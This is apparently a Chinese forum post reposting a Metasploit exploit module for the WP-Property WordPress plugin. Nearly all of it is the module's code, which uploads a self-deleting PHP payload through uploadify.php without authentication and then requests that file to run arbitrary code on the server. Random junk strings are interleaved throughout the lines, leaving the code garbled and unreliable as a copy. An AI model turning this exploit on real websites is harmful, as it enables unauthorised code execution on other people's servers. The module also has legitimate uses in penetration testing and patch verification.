WordPress WP-Property PHP 文件上传漏洞
9 T7 s5 [; O$ `# H
1 S. R; Y9 G' B! a1 I) e% L/ k3 M" L ## # This file is part of the Metasploit Framework and may be subject to
( R2 k: L( ~9 h
* d: @- x7 _ J+ |" g& s# redistribution and commercial restrictions. Please see the Metasploit
2 A; P, o' \. V: f4 w$ G" `8 U# a
! A# s. u- S ~8 _1 Y# Framework web site for more information on licensing and terms of use.2 C; g8 T: X3 a
7 c! G! |" O& r- Y# http://metasploit.com/framework/ ##% u0 G8 w$ W5 X9 i, G2 Y
8 R+ O3 P) F; h5 j- R. r) L3 M/ ^ 9 l+ V. P8 l8 _
9 b' _6 E) p, R
2 f2 W6 r: M% F) h5 b- j$ T6 r/ n) Z0 y; }* d! O9 A! H% E
require 'msf/core'
1 A9 L) I g5 |& A3 z9 d& W1 p( N2 Grequire 'msf/core/exploit/php_exe'! z5 g/ E$ @6 \5 d# j
% n; D# @ L# }5 {7 Q- Y' x
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
. p2 { ]" q+ u9 r'Description' => %q{; S$ X; q7 \+ U, Y9 f/ Q
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>0 C& F& S3 R! T, S$ x7 j
[
( o M: m, W+ \! T1 x- h( h! y'Sammy FORGIT', # initial discovery
5 E1 U. E2 G0 |4 D" j4 k& P7 J'James Fitts <fitts.james[at]gmail.com>' # metasploit module! I: S4 B. q! n3 _
],% L5 w9 ?& ~/ }% |% ]: ]/ F7 ~
'License' => MSF_LICENSE,
/ w9 f7 Z/ i6 C'References' =>; H+ q5 F# s! e; c7 v3 F6 j3 p
[6 ^* N! F/ I9 K: N4 n/ q
[ 'OSVDB', '82656' ],
0 F& e& h5 N3 J: P- c* {[ 'BID', '53787' ],
+ F N" N% ` S$ d, G9 Y[ 'EDB', '18987'],' D; `; w. J8 a+ H0 B
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
5 ^- ], k$ h4 V" u! @% j! U],2 Z; D8 K* l- f6 F( o0 P) ~
'Payload' =>; M, k- r0 M% E$ ^
{
( V8 [6 j3 h4 n" W, T3 u'BadChars' => "\x00",+ l, j% @! Z5 T# b$ G6 D, J
},. n/ u4 k' T, s2 r: P5 w9 K0 ~
'Platform' => 'php', H, J" u& N6 J2 b& U3 A# M c* [: N
'Arch' => ARCH_PHP,( d1 t+ \+ a4 {: c: F; n9 g
'Targets' =>0 A" t' E( _: E3 V, M
[# ]# N+ |. m( a3 I
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
& S, v; K! r2 r- \- V/ a2 s2 ^" P[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
; a9 A9 k% N# \: S& Q],' {) ~ X; P+ M5 d$ n) @1 D
'DefaultTarget' => 0,
" {# K7 ^; K$ d8 I# M'DisclosureDate' => 'Mar 26 2012'))7 g" H/ }& D! _! ]
! @7 x* F$ v# D9 W, V, Jregister_options(6 I$ N! R( m2 x8 b* k: C6 \9 k
[
. r8 \. }8 o( y+ ]7 g8 Q% pOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
. J- p0 D; F# G& P8 I* o# ^5 b2 h], self.class)5 Q7 v0 v3 P: v: S
end
9 S {7 g4 ~% G" u' }) @% F0 J) ~; N o2 u
def check
. G9 V8 H) K6 Z6 Z9 w3 I- Xuri = target_uri.path
; f4 [1 \( H" X) F, s9 Luri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',( w6 o) Y( E$ b. }0 f- l% H
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
& z9 G& q% ?5 @6 R0 G5 L Q8 a}); j- Z2 n+ O( P
0 r( H: k: p$ G
if not res or res.code != 200! z% |, T+ ?, v7 ]
return Exploit::CheckCode::Unknown/ \+ X' m4 A7 r8 E+ U* E M9 l; T
end
( o, ]3 Y# j+ k# v4 ]
8 O+ s/ L) C* R" \8 b+ k, greturn Exploit::CheckCode::Appears
. M4 f" u3 g/ h" f; x0 {end7 N5 _* N! A7 n* H- e+ d
5 ~& F/ n! K. b7 g+ ~1 E
def exploit4 P% j/ D [: {" [# y7 ]* m
uri = target_uri.path' A2 r2 u6 w( K" W
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)( l. ~0 p, S6 X! @7 R7 [
. d$ U J+ z% H) `data = Rex::MIME::Message.new' B1 j( W* h( s; `, m* X
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
5 H3 P2 [4 w( a. G) m# edata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")3 w' j- P. G+ v* N/ P' z
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
, a* b# ~" g4 c1 [! S; P( g& T D) Z r2 ~; y
print_status("#{peer} - Uploading payload #{@payload_name}")0 p) O) ?# A; |0 D
res = send_request_cgi({
+ u/ U. Z) X) T3 T'method' => 'POST',
2 \* }& S3 `% R/ D/ s/ l$ D'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
* P y9 H/ T; R'ctype' => "multipart/form-data; boundary=#{data.bound}",
; N) I' t3 ]+ `'data' => post_data: w3 F( |6 m- }
})1 l. U# j. q- m9 P' \
+ }% D( L6 ?. D) U* W, F
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
" q+ M ~8 F0 F6 P- \fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
; g% F8 D; O' J% }. D4 hend
9 S! U2 d7 u0 ~- y8 \7 g$ E- Z- L9 U% j) q: e' Z: l
upload_uri = res.body
& g/ g1 ^3 e) Z! z d6 z. |
- Q: ?6 U( b+ ^9 Rprint_status("#{peer} - Executing payload #{@payload_name}")7 q3 e/ `5 `+ c, r# @
res = send_request_raw({8 e! @6 ~& \3 a1 i
'uri' => upload_uri,+ D: \1 r% S- B
'method' => 'GET'
+ q, X2 e7 v8 }- F; V( s: w})! n% g3 Y; l" p- D
end6 W. F3 x& o! {
end0 r1 R1 R& B8 _! N4 z3 z
$ q$ w7 |2 f, A9 g8 X7 V) V不要问我这写的是什么 怎么利用 我是说msf./ @$ @. j* B* T# T( m: t9 k. Y
1 ?% ~, X6 N2 ]" X" y
|
发表于 2013-1-4 19:51:30
收藏
支持
反对